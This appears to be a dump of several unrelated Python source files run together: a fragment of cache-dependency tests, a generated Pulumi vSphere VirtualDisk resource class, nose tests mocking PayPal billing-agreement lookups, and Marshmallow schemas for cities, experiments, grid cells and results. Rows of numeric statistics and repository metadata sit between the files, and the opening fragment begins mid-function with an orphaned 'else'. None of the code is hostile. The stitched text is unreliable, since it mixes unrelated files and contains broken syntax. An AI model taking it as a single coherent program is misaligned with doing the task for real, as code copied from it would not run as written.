def f0(x=0):
return x + 2
else:
raise ValueError("Unsupported 'redefine' value.")
@memory.cache(dependencies=(f, f0))
@mark_dependency
def f1(x=0):
return f(x) + f0(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
if redefine == "f":
changed_funcs = (f, f1, f2)
elif redefine == "f0":
changed_funcs = (f0, f1, f2)
elif redefine == "f+f0":
changed_funcs = (f, f0, f1, f2)
for func in changed_funcs:
with pytest.raises(NotCachedError):
func.check_in_store(1)
if redefine == "f":
assert f(1) == 3
assert f0(1) == 4
assert f1(1) == -3
assert f2(1) == 97
elif redefine == "f0":
assert f(1) == 2
assert f0(1) == 3
assert f1(1) == -5
assert f2(1) == 95
elif redefine == "f+f0":
assert f(1) == 3
assert f0(1) == 3
assert f1(1) == -4
assert f2(1) == 96
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
def test_chained_uncached_dependencies(memory):
"""Test cache is invalidated when chained uncached dependencies change."""
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
assert f(1) == 2
assert f1(1) == -8
assert f2(1) == 92
# Defining the same functions as above should not invalidate the previous cache
# entries.
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
for func in (f1, f2):
assert func.check_in_store(1)
# However, redefining `f` should invalidate all cache entries.
@mark_dependency
def f(x=0):
return x + 2
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
for func in (f1, f2):
with pytest.raises(NotCachedError):
func.check_in_store(1)
assert f(1) == 3
assert f1(1) == -7
assert f2(1) == 93
| 21.643021 | 83 | 0.587333 | 1,288 | 9,458 | 4.233696 | 0.079193 | 0.123235 | 0.146525 | 0.091693 | 0.89382 | 0.886301 | 0.879699 | 0.860811 | 0.828168 | 0.819549 | 0 | 0.050541 | 0.286636 | 9,458 | 436 | 84 | 21.692661 | 0.75767 | 0.149292 | 0 | 0.922559 | 0 | 0 | 0.024681 | 0 | 0 | 0 | 0 | 0 | 0.16835 | 1 | 0.188552 | false | 0 | 0.013468 | 0.16835 | 0.37037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 8 |
1f54eef14a5743ffa76992d327f1012c045d4442 | 23,458 | py | Python | sdk/python/pulumi_vsphere/virtual_disk.py | pulumi/pulumi-vsphere | a4536cd49860323bd57cbf2a127c5b57c9f9b60c | [
"ECL-2.0",
"Apache-2.0"
] | 38 | 2018-09-17T18:56:29.000Z | 2022-03-26T03:07:20.000Z | sdk/python/pulumi_vsphere/virtual_disk.py | pulumi/pulumi-vsphere | a4536cd49860323bd57cbf2a127c5b57c9f9b60c | [
"ECL-2.0",
"Apache-2.0"
] | 75 | 2018-09-17T13:18:24.000Z | 2022-03-31T21:32:30.000Z | sdk/python/pulumi_vsphere/virtual_disk.py | pulumi/pulumi-vsphere | a4536cd49860323bd57cbf2a127c5b57c9f9b60c | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2019-10-05T10:30:01.000Z | 2020-09-30T11:16:59.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['VirtualDiskArgs', 'VirtualDisk']
@pulumi.input_type
class VirtualDiskArgs:
def __init__(__self__, *,
datastore: pulumi.Input[str],
size: pulumi.Input[int],
vmdk_path: pulumi.Input[str],
adapter_type: Optional[pulumi.Input[str]] = None,
create_directories: Optional[pulumi.Input[bool]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a VirtualDisk resource.
:param pulumi.Input[str] datastore: The name of the datastore in which to create the
disk.
:param pulumi.Input[int] size: Size of the disk (in GB).
:param pulumi.Input[str] vmdk_path: The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
:param pulumi.Input[str] adapter_type: The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
:param pulumi.Input[bool] create_directories: Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
:param pulumi.Input[str] datacenter: The name of the datacenter in which to create the
disk. Can be omitted when when ESXi or if there is only one datacenter in
your infrastructure.
:param pulumi.Input[str] type: The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
"""
pulumi.set(__self__, "datastore", datastore)
pulumi.set(__self__, "size", size)
pulumi.set(__self__, "vmdk_path", vmdk_path)
if adapter_type is not None:
warnings.warn("""this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""", DeprecationWarning)
pulumi.log.warn("""adapter_type is deprecated: this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""")
if adapter_type is not None:
pulumi.set(__self__, "adapter_type", adapter_type)
if create_directories is not None:
pulumi.set(__self__, "create_directories", create_directories)
if datacenter is not None:
pulumi.set(__self__, "datacenter", datacenter)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def datastore(self) -> pulumi.Input[str]:
"""
The name of the datastore in which to create the
disk.
"""
return pulumi.get(self, "datastore")
@datastore.setter
def datastore(self, value: pulumi.Input[str]):
pulumi.set(self, "datastore", value)
@property
@pulumi.getter
def size(self) -> pulumi.Input[int]:
"""
Size of the disk (in GB).
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: pulumi.Input[int]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="vmdkPath")
def vmdk_path(self) -> pulumi.Input[str]:
"""
The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
return pulumi.get(self, "vmdk_path")
@vmdk_path.setter
def vmdk_path(self, value: pulumi.Input[str]):
pulumi.set(self, "vmdk_path", value)
@property
@pulumi.getter(name="adapterType")
def adapter_type(self) -> Optional[pulumi.Input[str]]:
"""
The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
"""
return pulumi.get(self, "adapter_type")
@adapter_type.setter
def adapter_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adapter_type", value)
@property
@pulumi.getter(name="createDirectories")
def create_directories(self) -> Optional[pulumi.Input[bool]]:
"""
Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
"""
return pulumi.get(self, "create_directories")
@create_directories.setter
def create_directories(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "create_directories", value)
@property
@pulumi.getter
def datacenter(self) -> Optional[pulumi.Input[str]]:
"""
The name of the datacenter in which to create the
disk. Can be omitted when when ESXi or if there is only one datacenter in
your infrastructure.
"""
return pulumi.get(self, "datacenter")
@datacenter.setter
def datacenter(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "datacenter", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class _VirtualDiskState:
def __init__(__self__, *,
adapter_type: Optional[pulumi.Input[str]] = None,
create_directories: Optional[pulumi.Input[bool]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
datastore: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
vmdk_path: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering VirtualDisk resources.
:param pulumi.Input[str] adapter_type: The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
:param pulumi.Input[bool] create_directories: Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
:param pulumi.Input[str] datacenter: The name of the datacenter in which to create the
disk. Can be omitted when when ESXi or if there is only one datacenter in
your infrastructure.
:param pulumi.Input[str] datastore: The name of the datastore in which to create the
disk.
:param pulumi.Input[int] size: Size of the disk (in GB).
:param pulumi.Input[str] type: The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
:param pulumi.Input[str] vmdk_path: The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
if adapter_type is not None:
warnings.warn("""this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""", DeprecationWarning)
pulumi.log.warn("""adapter_type is deprecated: this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""")
if adapter_type is not None:
pulumi.set(__self__, "adapter_type", adapter_type)
if create_directories is not None:
pulumi.set(__self__, "create_directories", create_directories)
if datacenter is not None:
pulumi.set(__self__, "datacenter", datacenter)
if datastore is not None:
pulumi.set(__self__, "datastore", datastore)
if size is not None:
pulumi.set(__self__, "size", size)
if type is not None:
pulumi.set(__self__, "type", type)
if vmdk_path is not None:
pulumi.set(__self__, "vmdk_path", vmdk_path)
@property
@pulumi.getter(name="adapterType")
def adapter_type(self) -> Optional[pulumi.Input[str]]:
"""
The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
"""
return pulumi.get(self, "adapter_type")
@adapter_type.setter
def adapter_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adapter_type", value)
@property
@pulumi.getter(name="createDirectories")
def create_directories(self) -> Optional[pulumi.Input[bool]]:
"""
Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
"""
return pulumi.get(self, "create_directories")
@create_directories.setter
def create_directories(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "create_directories", value)
@property
@pulumi.getter
def datacenter(self) -> Optional[pulumi.Input[str]]:
"""
The name of the datacenter in which to create the
disk. Can be omitted when when ESXi or if there is only one datacenter in
your infrastructure.
"""
return pulumi.get(self, "datacenter")
@datacenter.setter
def datacenter(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "datacenter", value)
@property
@pulumi.getter
def datastore(self) -> Optional[pulumi.Input[str]]:
"""
The name of the datastore in which to create the
disk.
"""
return pulumi.get(self, "datastore")
@datastore.setter
def datastore(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "datastore", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the disk (in GB).
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="vmdkPath")
def vmdk_path(self) -> Optional[pulumi.Input[str]]:
"""
The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
return pulumi.get(self, "vmdk_path")
@vmdk_path.setter
def vmdk_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vmdk_path", value)
class VirtualDisk(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
adapter_type: Optional[pulumi.Input[str]] = None,
create_directories: Optional[pulumi.Input[bool]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
datastore: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
vmdk_path: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
The `VirtualDisk` resource can be used to create virtual disks outside
of any given `VirtualMachine`
resource. These disks can be attached to a virtual machine by creating a disk
block with the `attach` parameter.
## Example Usage
```python
import pulumi
import pulumi_vsphere as vsphere
my_disk = vsphere.VirtualDisk("myDisk",
datacenter="Datacenter",
datastore="local",
size=2,
type="thin",
vmdk_path="myDisk.vmdk")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] adapter_type: The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
:param pulumi.Input[bool] create_directories: Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
:param pulumi.Input[str] datacenter: The name of the datacenter in which to create the
disk. Can be omitted when when ESXi or if there is only one datacenter in
your infrastructure.
:param pulumi.Input[str] datastore: The name of the datastore in which to create the
disk.
:param pulumi.Input[int] size: Size of the disk (in GB).
:param pulumi.Input[str] type: The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
:param pulumi.Input[str] vmdk_path: The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VirtualDiskArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The `VirtualDisk` resource can be used to create virtual disks outside
of any given `VirtualMachine`
resource. These disks can be attached to a virtual machine by creating a disk
block with the `attach` parameter.
## Example Usage
```python
import pulumi
import pulumi_vsphere as vsphere
my_disk = vsphere.VirtualDisk("myDisk",
datacenter="Datacenter",
datastore="local",
size=2,
type="thin",
vmdk_path="myDisk.vmdk")
```
:param str resource_name: The name of the resource.
:param VirtualDiskArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VirtualDiskArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
adapter_type: Optional[pulumi.Input[str]] = None,
create_directories: Optional[pulumi.Input[bool]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
datastore: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
vmdk_path: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VirtualDiskArgs.__new__(VirtualDiskArgs)
if adapter_type is not None and not opts.urn:
warnings.warn("""this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""", DeprecationWarning)
pulumi.log.warn("""adapter_type is deprecated: this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""")
__props__.__dict__["adapter_type"] = adapter_type
__props__.__dict__["create_directories"] = create_directories
__props__.__dict__["datacenter"] = datacenter
if datastore is None and not opts.urn:
raise TypeError("Missing required property 'datastore'")
__props__.__dict__["datastore"] = datastore
if size is None and not opts.urn:
raise TypeError("Missing required property 'size'")
__props__.__dict__["size"] = size
__props__.__dict__["type"] = type
if vmdk_path is None and not opts.urn:
raise TypeError("Missing required property 'vmdk_path'")
__props__.__dict__["vmdk_path"] = vmdk_path
super(VirtualDisk, __self__).__init__(
'vsphere:index/virtualDisk:VirtualDisk',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
adapter_type: Optional[pulumi.Input[str]] = None,
create_directories: Optional[pulumi.Input[bool]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
datastore: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
vmdk_path: Optional[pulumi.Input[str]] = None) -> 'VirtualDisk':
"""
Get an existing VirtualDisk resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] adapter_type: The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
:param pulumi.Input[bool] create_directories: Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
:param pulumi.Input[str] datacenter: The name of the datacenter in which to create the
disk. Can be omitted when when ESXi or if there is only one datacenter in
your infrastructure.
:param pulumi.Input[str] datastore: The name of the datastore in which to create the
disk.
:param pulumi.Input[int] size: Size of the disk (in GB).
:param pulumi.Input[str] type: The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
:param pulumi.Input[str] vmdk_path: The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _VirtualDiskState.__new__(_VirtualDiskState)
__props__.__dict__["adapter_type"] = adapter_type
__props__.__dict__["create_directories"] = create_directories
__props__.__dict__["datacenter"] = datacenter
__props__.__dict__["datastore"] = datastore
__props__.__dict__["size"] = size
__props__.__dict__["type"] = type
__props__.__dict__["vmdk_path"] = vmdk_path
return VirtualDisk(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="adapterType")
def adapter_type(self) -> pulumi.Output[Optional[str]]:
"""
The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
"""
return pulumi.get(self, "adapter_type")
@property
@pulumi.getter(name="createDirectories")
def create_directories(self) -> pulumi.Output[Optional[bool]]:
"""
Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
"""
return pulumi.get(self, "create_directories")
@property
@pulumi.getter
def datacenter(self) -> pulumi.Output[Optional[str]]:
"""
The name of the datacenter in which to create the
disk. Can be omitted when when ESXi or if there is only one datacenter in
your infrastructure.
"""
return pulumi.get(self, "datacenter")
@property
@pulumi.getter
def datastore(self) -> pulumi.Output[str]:
"""
The name of the datastore in which to create the
disk.
"""
return pulumi.get(self, "datastore")
@property
@pulumi.getter
def size(self) -> pulumi.Output[int]:
"""
Size of the disk (in GB).
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def type(self) -> pulumi.Output[Optional[str]]:
"""
The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="vmdkPath")
def vmdk_path(self) -> pulumi.Output[str]:
"""
The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
return pulumi.get(self, "vmdk_path")
| 42.96337 | 173 | 0.623071 | 2,803 | 23,458 | 5.056011 | 0.074563 | 0.073737 | 0.066187 | 0.060542 | 0.879904 | 0.857183 | 0.840107 | 0.816822 | 0.808425 | 0.792478 | 0 | 0.000177 | 0.278626 | 23,458 | 545 | 174 | 43.042202 | 0.837312 | 0.370151 | 0 | 0.727941 | 1 | 0 | 0.134347 | 0.013366 | 0 | 0 | 0 | 0 | 0 | 1 | 0.154412 | false | 0.003676 | 0.018382 | 0 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2f1f20385c897eb2372dac06aca68616d7c699dd | 1,823 | py | Python | src/tests/paypal_tests.py | ab77/black.box | 01ab88b10763a831635d8e302e1e62544444e9fe | [
"Intel",
"OpenSSL",
"MIT"
] | 110 | 2016-09-22T20:43:16.000Z | 2022-03-21T09:53:24.000Z | src/tests/paypal_tests.py | ab77/black.box | 01ab88b10763a831635d8e302e1e62544444e9fe | [
"Intel",
"OpenSSL",
"MIT"
] | null | null | null | src/tests/paypal_tests.py | ab77/black.box | 01ab88b10763a831635d8e302e1e62544444e9fe | [
"Intel",
"OpenSSL",
"MIT"
] | 19 | 2017-04-09T00:02:31.000Z | 2021-04-19T03:40:57.000Z | from nose.tools import ok_, eq_, assert_is_not_none
from mock import patch
from uuid import uuid4
from paypal import (check_active_paypal_subscription,
get_paypal_billing_agreement,
get_paypal_billing_agreement_id_for_guid)
@patch('paypal.get_paypal_billing_agreement_id_for_guid', return_value='I-EJWG5K0RPNJP')
@patch('paypal.get_paypal_billing_agreement', return_value='{"agreement_state": "active"}')
def test_check_active_paypal_subscription_with_valid_guid_returns_active(mock_baid, mock_result):
result = check_active_paypal_subscription(guid=uuid4().get_hex())
assert_is_not_none(result)
eq_(result, 'I-EJWG5K0RPNJP')
@patch('paypal.get_paypal_billing_agreement_id_for_guid', return_value='I-OSKQBX1CWVSJ')
@patch('paypal.get_paypal_billing_agreement', return_value='{"agreement_state": "active"}')
def test_check_active_paypal_subscription_with_valid_baid(mock_baid, mock_result):
result = check_active_paypal_subscription(baid='I-OSKQBX1CWVSJ')
assert_is_not_none(result)
eq_(result, 'I-OSKQBX1CWVSJ')
@patch('paypal.get_paypal_billing_agreement_id_for_guid', return_value='I-RUE3FCPF10P5')
@patch('paypal.get_paypal_billing_agreement', return_value=None)
def test_check_active_paypal_subscription_with_valid_guid_returs_false(mock_baid, mock_result):
result = check_active_paypal_subscription(guid=uuid4().get_hex())
assert_is_not_none(result)
eq_(result, False)
@patch('paypal.get_paypal_billing_agreement_id_for_guid', return_value=None)
@patch('paypal.get_paypal_billing_agreement', return_value=None)
def test_check_active_paypal_subscription_with_invalid_baid_returns_false(mock_baid, mock_result):
result = check_active_paypal_subscription(baid='I-RUE3FCPF10P5')
assert_is_not_none(result)
eq_(result, False)
| 45.575 | 98 | 0.811849 | 253 | 1,823 | 5.316206 | 0.166008 | 0.066915 | 0.118959 | 0.185874 | 0.831227 | 0.831227 | 0.831227 | 0.805948 | 0.718216 | 0.70855 | 0 | 0.010896 | 0.093801 | 1,823 | 39 | 99 | 46.74359 | 0.803269 | 0 | 0 | 0.4 | 0 | 0 | 0.265496 | 0.179923 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2f49d286e9691b3844093f650fc30098428ba56d | 7,307 | py | Python | festival/schema.py | eubr-bigsea/festival | aa121d319769d9a414ba4e4c5b4e21879e95951e | [
"Apache-2.0"
] | null | null | null | festival/schema.py | eubr-bigsea/festival | aa121d319769d9a414ba4e4c5b4e21879e95951e | [
"Apache-2.0"
] | null | null | null | festival/schema.py | eubr-bigsea/festival | aa121d319769d9a414ba4e4c5b4e21879e95951e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import datetime
import json
from copy import deepcopy
from marshmallow import Schema, fields, post_load
from marshmallow.validate import OneOf
from festival.models import *
def partial_schema_factory(schema_cls):
schema = schema_cls(partial=True)
for field_name, field in schema.fields.items():
if isinstance(field, fields.Nested):
new_field = deepcopy(field)
new_field.schema.partial = True
schema.fields[field_name] = new_field
return schema
def load_json(str_value):
try:
return json.loads(str_value)
except:
return "Error loading JSON"
# region Protected\s*
# endregion
class CityCreateRequestSchema(Schema):
""" JSON serialization schema """
name = fields.String(required=True)
slug = fields.String(required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of City"""
return City(**data)
class Meta:
ordered = True
class CityListResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
name = fields.String(required=True)
slug = fields.String(required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of City"""
return City(**data)
class Meta:
ordered = True
class CityItemResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
name = fields.String(required=True)
slug = fields.String(required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of City"""
return City(**data)
class Meta:
ordered = True
class ExperimentCreateRequestSchema(Schema):
""" JSON serialization schema """
date = fields.DateTime(required=True)
type = fields.String(required=True,
validate=[OneOf(ResultType.__dict__.keys())])
city = fields.Nested(
'CityCreateRequestSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Experiment"""
return Experiment(**data)
class Meta:
ordered = True
class ExperimentListResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
date = fields.DateTime(required=True)
type = fields.String(required=True,
validate=[OneOf(ResultType.__dict__.keys())])
city = fields.Nested(
'CityListResponseSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Experiment"""
return Experiment(**data)
class Meta:
ordered = True
class ExperimentItemResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
date = fields.DateTime(required=True)
type = fields.String(required=True,
validate=[OneOf(ResultType.__dict__.keys())])
city = fields.Nested(
'CityItemResponseSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Experiment"""
return Experiment(**data)
class Meta:
ordered = True
class GridCellCreateRequestSchema(Schema):
""" JSON serialization schema """
north_latitude = fields.Decimal(required=True)
south_latitude = fields.Decimal(required=True)
east_longitude = fields.Decimal(required=True)
west_longitude = fields.Decimal(required=True)
city = fields.Nested(
'CityCreateRequestSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of GridCell"""
return GridCell(**data)
class Meta:
ordered = True
class GridCellListResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
north_latitude = fields.Decimal(required=True)
south_latitude = fields.Decimal(required=True)
east_longitude = fields.Decimal(required=True)
west_longitude = fields.Decimal(required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of GridCell"""
return GridCell(**data)
class Meta:
ordered = True
class GridCellItemResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
north_latitude = fields.Decimal(required=True)
south_latitude = fields.Decimal(required=True)
east_longitude = fields.Decimal(required=True)
west_longitude = fields.Decimal(required=True)
city = fields.Nested(
'CityItemResponseSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of GridCell"""
return GridCell(**data)
class Meta:
ordered = True
class ResultCreateRequestSchema(Schema):
""" JSON serialization schema """
date = fields.DateTime(required=True)
updated = fields.DateTime(required=True)
value = fields.Float(required=False, allow_none=True)
grid_cell = fields.Nested(
'GridCellCreateRequestSchema',
required=True)
experiment = fields.Nested(
'ExperimentCreateRequestSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Result"""
return Result(**data)
class Meta:
ordered = True
class ResultListResponseSchema(Schema):
""" JSON serialization schema """
value = fields.Float(required=False, allow_none=True)
grid_cell = fields.Nested(
'GridCellListResponseSchema',
required=True)
latitude = fields.Function(lambda x: float(
x.grid_cell.north_latitude + x.grid_cell.south_latitude) * .5)
longitude = fields.Function(lambda x: float(
x.grid_cell.east_longitude + x.grid_cell.west_longitude) * .5)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Result"""
return Result(**data)
class Meta:
ordered = True
class ResultItemResponseSchema(Schema):
""" JSON serialization schema """
value = fields.Float(required=False, allow_none=True)
latitude = fields.Function(lambda x: float(
x.grid_cell.north_latitude + x.grid_cell.south_latitude) * .5)
longitude = fields.Function(lambda x: float(
x.grid_cell.east_longitude + x.grid_cell.west_longitude) * .5)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Result"""
return Result(**data)
class Meta:
ordered = True
